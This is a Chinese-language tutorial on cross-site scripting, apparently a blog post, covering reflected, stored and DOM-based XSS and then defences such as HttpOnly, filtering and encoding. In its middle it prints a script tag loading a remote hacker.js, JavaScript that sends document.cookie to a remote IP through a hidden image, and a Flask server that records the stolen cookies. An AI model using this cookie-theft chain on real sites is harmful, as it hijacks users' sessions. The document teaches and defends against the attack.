簡單的測試方法：

所有提交數據的地方都有可能存在XSS，可以用最簡單腳本進行測試：

<script>alert(“1”)</script>

XSS攻擊類型

反射型：

黑客構造一個包含XSS代碼的URL（服務器中沒有這樣的頁面和內容），誘導或等待用戶去點擊鏈接，才能觸發XSS代碼，達到劫持訪問、獲取cookies的目的。一般容易出現在搜索頁面。

持久型：

如果黑客可以將腳本代碼通過發布內容（如發論壇、博文、寫留言等）的方式發布后，存儲在服務端的數據庫或者文件中，成為某個url正常的頁面的一部分，所有訪問這個頁面的所有用戶都是受害者，看似正常的url，則其頁面已經包含了xss代碼，持久型XSS更具有隱蔽性，帶來的危害也更大

例如：在頁面中不容注意的地方加一段js腳本（如下），當頁面被打開時，頁面會加載這段腳本，加系統登錄的cookies發送到遠端hacker的手中。

<script type="text/javascript" src="https://xss.xxx.com/hacker.js"></script>

DOM型：

DOM就是一個樹狀的模型，你可以編寫Javascript代碼根據DOM一層一層的節點，去遍歷/獲取/修改對應的節點，對象，值。dom xss并不復雜，他也屬于反射型xss的一種(，domxss取決于輸出位置，并不取決于輸出環境，因此domxss既有可能是反射型的，也有可能是存儲型的)，簡單去理解就是因為他輸出點在DOM，所以在道哥的《白帽子講Web安全里》也有詳細介紹。xss代碼可能是簡短的插入script節點的語句，載入來自第三方域的含有具體惡意代碼的腳本。具體的惡意代碼，常見的行為是讀取cookie，構造例如一個img標簽，將其src屬性指向惡意第三方網站，將cookie的內容作為參數附在src的url上，這樣黑客就能在其網站上獲得你的cookie信息，這就是所謂的cookie劫持。

js獲取瀏覽器的cookies， 通過網絡將cookies發送給遠端的接https://xss.xxx.com/hacker.js，收程序。

var img =
document.createElement('img');
img.width = 0;
img.height = 0;
img.src =
'http://10.100.100.14:5000/?hacker='+encodeURIComponent(document.cookie);

接收端，利用python flask寫個非常簡單的項目

from flask import Flask, request

app = Flask(__name__)

@app.route('/')

def get_cookies():

 text = request.args.get('hacker')

 with open(file_path, mode='a', encoding='utf-8') as f:

 f.writelines(text + "
")

if __name__ == '__main__':

 app.run(host='0.0.0.0', port=5000, debug=app.debug, threaded=True)

XSS攻擊防御

設置HttpOnly以避免cookie劫持的危險。

過濾，對諸如

<script>、<img>、<a>

等標簽進行過濾。

編碼，像一些常見的符號，如<>在輸入的時候要對其進行轉換編碼，這樣做瀏覽器是不會對該標簽進行解釋執行的，同時也不影響顯示效果。

限制，通過以上的案例我們不難發現xss攻擊要能達成往往需要較長的字符串，因此對于一些可以預期的輸入可以通過限制長度強制截斷來進行防御。